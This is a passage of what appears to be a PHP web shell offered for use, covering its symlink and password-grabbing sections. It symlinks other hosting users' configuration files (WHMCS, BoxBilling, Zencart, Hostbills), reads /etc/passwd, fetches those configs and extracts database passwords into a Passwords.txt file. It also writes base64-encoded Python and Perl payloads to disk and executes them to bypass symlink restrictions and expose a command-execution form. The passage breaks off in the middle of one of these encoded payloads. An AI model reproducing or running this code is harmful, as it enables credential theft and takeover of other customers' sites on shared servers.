  2961. @symlink('/home4/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  2962. @symlink('/home4/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  2963. @symlink('/home4/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  2964. @symlink('/home4/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  2965. @symlink('/home4/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  2966. @symlink('/home4/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  2967. @symlink('/home4/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  2968. @symlink('/home4/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  2969. @symlink('/home4/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  2970. @symlink('/home4/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  2971. @symlink('/home4/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  2972. @symlink('/home4/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  2973. @symlink('/home4/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  2974. @symlink('/home4/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  2975. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2976. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2977. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2978. @symlink('/home4/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  2979. @symlink('/home4/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  2980. @symlink('/home4/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  2981. @symlink('/home4/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  2982. @symlink('/home4/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  2983. @symlink('/home4/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  2984. @symlink('/home4/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  2985. @symlink('/home4/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  2986. @symlink('/home4/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  2987. @symlink('/home4/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  2988. @symlink('/home4/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  2989. @symlink('/home4/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  2990. @symlink('/home4/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  2991. @symlink('/home4/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  2992. @symlink('/home4/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  2993. @symlink('/home4/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  2994. @symlink('/home4/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  2995. @symlink('/home4/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  2996. @symlink('/home4/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  2997. @symlink('/home4/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  2998. @symlink('/home4/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  2999. @symlink('/home4/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  3000. @symlink('/home4/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  3001. @symlink('/home4/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  3002. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  3003. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  3004. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  3005. @symlink('/home4/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  3006. @symlink('/home4/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  3007. @symlink('/home4/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  3008. @symlink('/home4/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  3009. @symlink('/home4/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  3010. @symlink('/home4/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  3011. @symlink('/home4/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  3012. @symlink('/home4/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  3013. @symlink('/home4/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  3014. @symlink('/home4/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  3015. @symlink('/home4/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  3016. @symlink('/home4/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  3017. @symlink('/home4/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  3018. @symlink('/home4/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  3019. @symlink('/home4/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  3020. @symlink('/home4/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  3021. @symlink('/home4/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  3022. @symlink('/home4/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  3023. @symlink('/home4/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  3024. @symlink('/home4/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  3025. @symlink('/home4/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  3026. @symlink('/home4/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  3027. @symlink('/home4/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  3028. @symlink('/home4/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  3029. @symlink('/home4/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  3030. @symlink('/home4/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  3031. @symlink('/home4/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  3032. @symlink('/home4/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  3033. @symlink('/home4/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  3034. @symlink('/home4/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  3035. @symlink('/home4/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  3036. @symlink('/home4/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  3037. @symlink('/home4/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  3038. @symlink('/home4/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  3039. @symlink('/home4/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  3040. @symlink('/home4/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  3041. @symlink('/home4/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  3042. @symlink('/home4/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  3043. @symlink('/home4/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  3044. @symlink('/home4/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  3045. @symlink('/home4/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  3046. @symlink('/home4/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  3047. @symlink('/home4/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  3048. @symlink('/home4/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  3049. @symlink('/home4/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  3050. @symlink('/home4/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  3051. @symlink('/home4/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  3052. @symlink('/home4/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  3053. @symlink('/home4/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  3054. @symlink('/home4/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  3055. @symlink('/home4/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  3056.  
  3057. }
  3058.  
  3059. //password grab
  3060.  
  3061. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
  3062. {
  3063.  
  3064. $ar0=explode($marqueurDebutLien, $text);
  3065. $ar1=explode($marqueurFinLien, $ar0[1]);
  3066. $ar=trim($ar1[0]);
  3067. return $ar;
  3068. }
  3069.  
  3070. $ffile=fopen('Passwords.txt','a+');
  3071.  
  3072.  
  3073. $r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/spade_sym/";
  3074. $re=$r;
  3075. $confi=array("-Wordpress.txt","-Joomla.txt","-WHMCS.txt","-Vbulletin.txt","-Other.txt","-Zencart.txt","-Hostbills.txt","-SMF.txt","-Drupal.txt","-OsCommerce.txt","-MyBB.txt","-PHPBB.txt","-IPB.txt","-BoxBilling.txt");
  3076.  
  3077. $users=file("/etc/passwd");
  3078. foreach($users as $user)
  3079. {
  3080.  
  3081. $str=explode(":",$user);
  3082. $usersss=$str[0];
  3083. foreach($confi as $co)
  3084. {
  3085.  
  3086.  
  3087. $uurl=$re.$usersss.$co;
  3088. $uel=$uurl;
  3089.  
  3090. $ch = curl_init();
  3091.  
  3092. curl_setopt($ch, CURLOPT_URL, $uel);
  3093. curl_setopt($ch, CURLOPT_HEADER, 1);
  3094. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3095. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  3096. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
  3097. $result['EXE'] = curl_exec($ch);
  3098. curl_close($ch);
  3099. $uxl=$result['EXE'];
  3100.  
  3101.  
  3102. if($uxl && preg_match('/table_prefix/i',$uxl))
  3103. {
  3104.  
  3105. //Wordpress
  3106.  
  3107. $dbp=entre2v2($uxl,"DB_PASSWORD', '","');");
  3108. if(!empty($dbp))
  3109. $pass=$dbp."\n";
  3110. fwrite($ffile,$pass);
  3111.  
  3112. }
  3113. elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl))
  3114. {
  3115.  
  3116. //WHMCS
  3117.  
  3118. $dbp=entre2v2($uxl,"db_password = '","';");
  3119. if(!empty($dbp))
  3120. $pass=$dbp."\n";
  3121. fwrite($ffile,$pass);
  3122.  
  3123. }
  3124.  
  3125.  
  3126. elseif($uxl && preg_match('/dbprefix/i',$uxl))
  3127. {
  3128.  
  3129. //Joomla
  3130.  
  3131. $db=entre2v2($uxl,"password = '","';");
  3132. if(!empty($db))
  3133. $pass=$db."\n";
  3134. fwrite($ffile,$pass);
  3135. }
  3136. elseif($uxl && preg_match('/admincpdir/i',$uxl))
  3137. {
  3138.  
  3139. //Vbulletin
  3140.  
  3141. $db=entre2v2($uxl,"password'] = '","';");
  3142. if(!empty($db))
  3143. $pass=$db."\n";
  3144. fwrite($ffile,$pass);
  3145.  
  3146. }
  3147. elseif($uxl && preg_match('/DB_DATABASE/i',$uxl))
  3148. {
  3149.  
  3150. //Other
  3151.  
  3152. $db=entre2v2($uxl,"DB_PASSWORD', '","');");
  3153. if(!empty($db))
  3154. $pass=$db."\n";
  3155. fwrite($ffile,$pass);
  3156. }
  3157. elseif($uxl && preg_match('/dbpass/i',$uxl))
  3158. {
  3159.  
  3160. //Other
  3161.  
  3162. $db=entre2v2($uxl,"dbpass = '","';");
  3163. if(!empty($db))
  3164. $pass=$db."\n";
  3165. fwrite($ffile,$pass);
  3166. }
  3167. elseif($uxl && preg_match('/dbpass/i',$uxl))
  3168. {
  3169.  
  3170. //Other
  3171.  
  3172. $db=entre2v2($uxl,"dbpass = '","';");
  3173. if(!empty($db))
  3174. $pass=$db."\n";
  3175. fwrite($ffile,$pass);
  3176.  
  3177. }
  3178. elseif($uxl && preg_match('/dbpass/i',$uxl))
  3179. {
  3180.  
  3181. //Other
  3182.  
  3183. $db=entre2v2($uxl,"dbpass = \"","\";");
  3184. if(!empty($db))
  3185. $pass=$db."\n";
  3186. fwrite($ffile,$pass);
  3187. }
  3188.  
  3189.  
  3190. }
  3191. }
  3192. echo "<center>
  3193. <a href=\"spade_sym/root/\">Root Server</a>
  3194. <br><a href=\"spade_sym/Passwords.txt\">Passwords</a>
  3195. <br><a href=\"spade_sym/\">Configurations</a></center>";
  3196. }
  3197. else
  3198. {
  3199. echo "<center>
  3200. <form method=\"POST\">
  3201. <textarea name=\"passwd\" class='area' rows='15' cols='60'>";
  3202. $file = '/etc/passwd';
  3203. $read = @fopen($file, 'r');
  3204. if ($read){
  3205. $body = @fread($read, @filesize($file));
  3206. echo "".htmlentities($body)."";
  3207. }
  3208. elseif(!$read)
  3209. {
  3210. $read = @show_source($file) ;
  3211. }
  3212. elseif(!$read)
  3213. {
  3214. $read = @highlight_file($file);
  3215. }
  3216. elseif(!$read)
  3217. {
  3218. for($uid=0;$uid<1000;$uid++)
  3219. {
  3220. $ara = posix_getpwuid($uid);
  3221. if (!empty($ara))
  3222. {
  3223. while (list ($key, $val) = each($ara))
  3224. {
  3225. print "$val:";
  3226. }
  3227. print "\n";
  3228. }}}
  3229.  
  3230. flush();
  3231.  
  3232. echo "</textarea>
  3233. <p><input name=\"m\" size=\"80\" value=\"Start\" type=\"submit\"/></p>
  3234. </form></center>";
  3235. }
  3236. }
  3237. }elseif($_GET['do'] == 'symlink2'){
  3238. echo "<center><h1 class='titulo'>SERVER SYMLINKER 2</h1><br><table><form method=post><tr><td><input type=submit name='pythonsym' value='Python Symlink'></td><td><input type=submit name='perlsym' value='Perl Symlink'></td><td><input type=submit name='sym1' value='Symlink V1'></td><td><input type=submit name='sym2' value='Symlink V2'></td></tr></form></table>";
  3239. if(isset($_POST['pythonsym'])){
  3240. $htsym = "Iy8qUHl0aG9uCgppbXBvcnQgdGltZQppbXBvcnQgb3MKaW1wb3J0IHN5cwppbXBvcnQgcmUKCm9zLnN5c3RlbSgiY29sb3IgQyIpCgpodGEgPSAiXG5GaWxlIDogLmh0YWNjZXNzIC8vIENyZWF0ZWQgU3VjY2Vzc2Z1bGx5ITxicj4iCmYgPSAiQWxsIFByb2Nlc3NlcyBEb25lIVxuU3ltbGluayBCeXBhc3NlZCBTdWNjZXNzZnVsbHkhPGJyPiIKCm9zLm1ha2VkaXJzKCdTcGFkZV9weXRob25zeW0nKQpvcy5jaGRpcignU3BhZGVfcHl0aG9uc3ltJykKCnN1c3I9W10Kc2l0ZXg9W10Kb3Muc3lzdGVtKCJsbiAtcyAvIHNwLnR4dCIpCgpoID0gIk9wdGlvbnMgSW5kZXhlcyBGb2xsb3dTeW1MaW5rc1xuRGlyZWN0b3J5SW5kZXggc3AucGh0bWxcbkFkZFR5cGUgdHh0IC5waHBcbkFkZEhhbmRsZXIgdHh0IC5waHAiCm0gPSBvcGVuKCIuaHRhY2Nlc3MiLCJ3KyIpCm0ud3JpdGUoaCkKbS5jbG9zZSgpCnByaW50IGh0YQoKc2YgPSAiPGh0bWw+PHRpdGxlPlN5bWxpbmsgQnlwYXNzPC90aXRsZT48Y2VudGVyPjxmb250IGNvbG9yPWxpbWUgc2l6ZT01PjxwcmU+CgkgIF9fXyAgICAgICAgICAgICAgICAgICAgICAgICBfX18gICAgICAgICAgIF9fXyAgICAgICAgICAgX19fICAgICAKICAgICAvICAvXCAgICAgICAgICBfX18gICAgICAgICAgLyAgL1wgICAgICAgICAvICAvXCAgICAgICAgIC8gIC9cICAgIAogICAgLyAgLzo6XCAgICAgICAgLyAgL1wgICAgICAgIC8gIC86OlwgICAgICAgLyAgLzo6XCAgICAgICAvICAvOjpcICAgCiAgIC9fXy86L1w6XCAgICAgIC8gIC86OlwgICAgICAvICAvOi9cOlwgICAgIC8gIC86L1w6XCAgICAgLyAgLzovXDpcICAKICBfXF8gXDpcIFw6XCAgICAvICAvOi9cOlwgICAgLyAgLzo6XCBcOlwgICAvICAvOi8gIFw6XCAgIC8gIC86OlwgXDpcIAogL19fL1wgXDpcIFw6XCAgLyAgLzo6XCBcOlwgIC9fXy86L1w6XF9cOlwgL19fLzovIFxfX1w6fCAvX18vOi9cOlwgXDpcCiBcICBcOlwgXDpcX1wvIC9fXy86L1w6XF9cOlwgXF9fXC8gIFw6XC86LyBcICBcOlwgLyAgLzovIFwgIFw6XCBcOlxfXC8KICBcICBcOlxfXDpcICAgXF9fXC8gIFw6XC86LyAgICAgIFxfX1w6Oi8gICBcICBcOlwgIC86LyAgIFwgIFw6XCBcOlwgIAogICBcICBcOlwvOi8gICAgICAgIFwgIFw6Oi8gICAgICAgLyAgLzovICAgICBcICBcOlwvOi8gICAgIFwgIFw6XF9cLyAgCiAgICBcICBcOjovICAgICAgICAgIFxfX1wvICAgICAgIC9fXy86LyAgICAgICBcX19cOjovICAgICAgIFwgIFw6XCAgICAKICAgICBcX19cLyAgICAgICAgICAgICAgICAgICAgICAgXF9fXC8gICAgICAgICAgICB+fiAgICAgICAgIFxfX1wvICAgCiAgICAgICAgICAgICAgICAgICAgICAgCjwvcHJlPjxicj5TeW1saW5rIEJ5cGFzczxicj48Zm9udCBjb2xvcj1saW1lIHNpemU9Mz48dGFibGU+IgoKbyA9IG9wZW4oJy9ldGMvcGFzc3dkJywncicpCm89by5yZWFkKCkKbyA9IHJlLmZpbmRhbGwoJy9ob21lL1x3KycsbykKCmZvciB4dXNyIGluIG86Cgl4dXNyPXh1c3IucmVwbGFjZSgnL2hvbWUvJywnJykKCXN1c3IuYXBwZW5kKHh1c3IpCnByaW50ICItIiozMAp4c2l0ZSA9IG9zLmxpc3RkaXIoIi92YXIvbmFtZWQiKQoKZm9yIHh4c2l0ZSBpbiB4c2l0ZToKCXh4c2l0ZT14eHNpdGUucmVwbGFjZSgiLmRiIiwiIikKCXNpdGV4LmFwcGVuZCh4eHNpdGUpCnByaW50IGYKcGF0aD1vcy5nZXRjd2QoKQppZiAiL3B1YmxpY19odG1sLyIgaW4gcGF0aDoKCXBhdGg9Ii9wdWJsaWNfaHRtbC8iCmVsc2U6CglwYXRoID0gIi9odG1sLyIKY291bnRlcj0xCmlwcz1vcGVuKCJzcC5waHRtbCIsInciKQppcHMud3JpdGUoc2YpCgpmb3IgZnVzciBpbiBzdXNyOgoJZm9yIGZzaXRlIGluIHNpdGV4OgoJCWZ1PWZ1c3JbMDo1XQoJCXM9ZnNpdGVbMDo1XQoJCWlmIGZ1PT1zOgoJCQlpcHMud3JpdGUoIjx0cj48dGQgc3R5bGU9Zm9udC1mYW1pbHk6Y2FsaWJyaTtmb250LXdlaWdodDpib2xkO2NvbG9yOmxpbWU7PiVzPC90ZD48dGQgc3R5bGU9Zm9udC1mYW1pbHk6Y2FsaWJyaTtmb250LXdlaWdodDpib2xkO2NvbG9yOnJlZDs+JXM8L3RkPjx0ZCBzdHlsZT1mb250LWZhbWlseTpjYWxpYnJpO2ZvbnQtd2VpZ2h0OmJvbGQ7PjxhIGhyZWY9c3AudHh0L2hvbWUvJXMlcyB0YXJnZXQ9X2JsYW5rID4lczwvYT48L3RkPiIlKGNvdW50ZXIsZnVzcixmdXNyLHBhdGgsZnNpdGUpKQoJCQljb3VudGVyPWNvdW50ZXIrMQ==";
  3241. $meme = base64_decode($htsym);
  3242. $fp = fopen('sp.py','w');
  3243. $fw = fwrite($fp,$meme);
  3244. @fclose($fw);
  3245. $eaacho = exe("python sp.py"); echo $eaacho; echo "<center><iframe src='Spade_pythonsym' height='400' width='98%'></iframe></center>";
  3246. unlink ('sp.py');
  3247. }
  3248. if(isset($_POST['perlsym'])){
  3249. $peperl = "IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluCgpsb2NhbCAoJGJ1ZmZlciwgQHBhaXJzLCAkcGFpciwgJG5hbWUsICR2YWx1ZSwgJUZPUk0pOwogICAgIyBSZWFkIGluIHRleHQKICAgICRFTlZ7J1JFUVVFU1RfTUVUSE9EJ30gPX4gdHIvYS16L0EtWi87CiAgICBpZiAoJEVOVnsnUkVRVUVTVF9NRVRIT0QnfSBlcSAiR0VUIikKICAgIHsKCSRidWZmZXIgPSAkRU5WeydRVUVSWV9TVFJJTkcnfTsKICAgIH0KICAgICMgU3BsaXQgaW5mb3JtYXRpb24gaW50byBuYW1lL3ZhbHVlIHBhaXJzCiAgICBAcGFpcnMgPSBzcGxpdCgvJi8sICRidWZmZXIpOwogICAgZm9yZWFjaCAkcGFpciAoQHBhaXJzKQogICAgewoJKCRuYW1lLCAkdmFsdWUpID0gc3BsaXQoLz0vLCAkcGFpcik7CgkkdmFsdWUgPX4gdHIvKy8gLzsKCSR2YWx1ZSA9fiBzLyUoLi4pL3BhY2soIkMiLCBoZXgoJDEpKS9lZzsKCSRGT1JNeyRuYW1lfSA9ICR2YWx1ZTsKICAgIH0KICAgICRzZXJ2ZXIgPSAkRk9STXtzZXJ2ZXJ9OwogICAgJHBlcmwgID0gJEZPUk17cGVybH07CgkkY29uZmlnICA9ICRGT1JNe2NvbmZpZ307CgkkZXhlY3V0ZSAgPSAkRk9STXtleGVjdXRlfTsKCSRleGVjbWQgPSAkRk9STXtleGVjbWR9OwoJJGV4ZSAgPSAkRk9STXtleGV9OwpwcmludCAiQ29udGVudC10eXBlOiB0ZXh0L2h0bWxcblxuIjsKcHJpbnQnPCFET0NUWVBFIGh0bWwgUFVCTElDICItLy9XM0MvL0RURCBYSFRNTCAxLjAgVHJhbnNpdGlvbmFsLy9FTiIgImh0dHA6Ly93d3cudzMub3JnL1RSL3hodG1sMS9EVEQveGh0bWwxLXRyYW5zaXRpb25hbC5kdGQiPgo8aHRtbCB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94aHRtbCI+CjxoZWFkPgo8aHR0cC1lcXVpdj0iQ29udGVudC1MYW5ndWFnZSIgY29udGVudD0iZW4tdXMiIC8+CjxodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCIgLz4KPHN0eWxlIHR5cGU9InRleHQvY3NzIj4KLm5ld1N0eWxlMSB7CmJhY2tncm91bmQtY29sb3I6ICMxMTExMTE7CmZvbnQtZmFtaWx5OiAiQ291cmllciBOZXciLCBDb3VyaWVyLCBtb25vc3BhY2U7CmZvbnQtd2VpZ2h0OiBib2xkOwpjb2xvcjogbGltZTsKfQouc3R5bGUxIHsKdGV4dC1hbGlnbjogY2VudGVyOwpmb250LWNvbG9yOiBsaW1lOwp9Ci5idXQKe2JhY2tncm91bmQtY29sb3I6ICMxMTExMTE7Y29sb3I6bGltZTsgYm9yZGVyLWNvbG9yOiMxMTExMTE7fQouYm94CntiYWNrZ3JvdW5kLWNvbG9yOiMxYzFjMWM7Y29sb3I6bGltZTt3aWR0aDoyNyU7IGJvcmRlci1jb2xvcjojMTExMTExO30KLnRib3gKe2JhY2tncm91bmQtY29sb3I6IzFjMWMxYztjb2xvcjpsaW1lO2JvcmRlci1jb2xvcjojMTExMTExO30KPC9zdHlsZT4KPC9oZWFkPgo8Ym9keSBjbGFzcz0ibmV3U3R5bGUxIj4KPGNlbnRlcj48Zm9udCBzaXplPTQ+PHByZT4KICAgICAgX19fICAgICAgICAgICAgICAgICAgICAgICAgIF9fXyAgICAgICAgICAgX19fICAgICAgICAgICBfX18gICAgIAogICAgIC8gIC9cICAgICAgICAgIF9fXyAgICAgICAgICAvICAvXCAgICAgICAgIC8gIC9cICAgICAgICAgLyAgL1wgICAgCiAgICAvICAvOjpcICAgICAgICAvICAvXCAgICAgICAgLyAgLzo6XCAgICAgICAvICAvOjpcICAgICAgIC8gIC86OlwgICAKICAgL19fLzovXDpcICAgICAgLyAgLzo6XCAgICAgIC8gIC86L1w6XCAgICAgLyAgLzovXDpcICAgICAvICAvOi9cOlwgIAogIF9cXyBcOlwgXDpcICAgIC8gIC86L1w6XCAgICAvICAvOjpcIFw6XCAgIC8gIC86LyAgXDpcICAgLyAgLzo6XCBcOlwgCiAvX18vXCBcOlwgXDpcICAvICAvOjpcIFw6XCAgL19fLzovXDpcX1w6XCAvX18vOi8gXF9fXDp8IC9fXy86L1w6XCBcOlwKIFwgIFw6XCBcOlxfXC8gL19fLzovXDpcX1w6XCBcX19cLyAgXDpcLzovIFwgIFw6XCAvICAvOi8gXCAgXDpcIFw6XF9cLwogIFwgIFw6XF9cOlwgICBcX19cLyAgXDpcLzovICAgICAgXF9fXDo6LyAgIFwgIFw6XCAgLzovICAgXCAgXDpcIFw6XCAgCiAgIFwgIFw6XC86LyAgICAgICAgXCAgXDo6LyAgICAgICAvICAvOi8gICAgIFwgIFw6XC86LyAgICAgXCAgXDpcX1wvICAKICAgIFwgIFw6Oi8gICAgICAgICAgXF9fXC8gICAgICAgL19fLzovICAgICAgIFxfX1w6Oi8gICAgICAgXCAgXDpcICAgIAogICAgIFxfX1wvICAgICAgICAgICAgICAgICAgICAgICBcX19cLyAgICAgICAgICAgIH5+ICAgICAgICAgXF9fXC8gICAgCgogICAgICAgICAgICAgICAgICAgICAgIAo8L3ByZT48L2ZvbnQ+PC9mb250PjwvY2VudGVyPiAKPHAgY2xhc3M9InN0eWxlMSI+PC9wPgo8dGFibGUgYWxpZ249Y2VudGVyPjx0cj48dGQ+PGZvcm0+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9InNlcnZlciIgdmFsdWU9IlNlcnZlciBTeW0iPjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJTZXJ2ZXIiIGNsYXNzPWJ1dD48L2Zvcm0+PC90ZD4KPHRkPjxmb3JtPjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPSJwZXJsIiB2YWx1ZT0iUGVybCBTeW0iPjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJQZXJsIiBjbGFzcz1idXQ+PC9mb3JtPjwvdGQ+Cjx0ZD48Zm9ybT48aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT0iY29uZmlnIiB2YWx1ZT0iR2V0IGNvbmZpZyI+PGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkNvbmZpZyIgY2xhc3M9YnV0PjwvZm9ybT48L3RkPjwvdHI+PC90YWJsZT48YnI+PGJyPgo8Y2VudGVyPjxmb3JtPjxpbnB1dCB0eXBlPXRleHQgbmFtZT1leGVjdXRlIGNsYXNzPWJveCB2YWx1ZT0nLiRleGVjdXRlLic+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ImV4ZWNtZCIgdmFsdWU9IkV4ZWN1dGUiPiA8aW5wdXQgdHlwZT1zdWJtaXQgbmFtZT1leGUgdmFsdWU9IkV4ZWN1dGUiIGNsYXNzPWJ1dD48L2Zvcm0+PC9jZW50ZXI+JzsKCnN1YiBnZXRzeW0KewoJCQlzeW1saW5rKCcvaG9tZS8nLiRfWzBdLicvcHVibGljX2h0bWwvdmIvaW5jbHVkZXMvY29uZmlnLnBocCcsJF9bMV0uJ35+dkJ1bGxldGluMS50eHQnKTsKCQkJc3ltbGluaygnL2hvbWUvJy4kX1swXS4nL3B1YmxpY19odG1sL2NvcmUvaW5jbHVkZXMvY29uZmlnLnBocCcsJF9bMV0uJ35+dkJ1bGxldGluNS50eHQnKTsKCQkJc3ltbGluaygnL2hvbWUvJy4kX1swXS4nL3B1YmxpY19odG1sL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRfWzFdLid+fnZCdWxsZXRpbjIudHh0Jyk7CgkJCXN5bWxpbmsoJy9ob21lLycuJF9bMF0uJy9wdWJsaWNfaHRtbC9mb3J1bS9pbmNsdWRlcy9jb25maWcucGhwJywkX1sxXS4nfn52QnVsbGV0aW4zLnR4dCcpOwoJCQlzeW1saW5rKCcvaG9tZS8nLiRfWzBdLicvcHVibGljX2h0bWwvdmIvY29yZS9pbmNsdWRlcy9jb25maWcucGhwJywkX1sxXS4nfn52QnVsbGV0aW41LnR4dCcpOwoJCQlzeW1saW5rKCcvaG9tZS8nLiRfWzBdLicvcHVibGljX2h0bWwvaW5jL2NvbmZpZy5waHAnLCRfWzFdLid+fm15YmIudHh0Jyk7CgkJCXN5bWxpbmsoJy9ob21lLycuJF9bMF0uJy9wdWJsaWNfaHRtbC9jb25maWcucGhwJywkX1sxXS4nfn5QaHBiYjEudHh0Jyk7CgkJCXN5b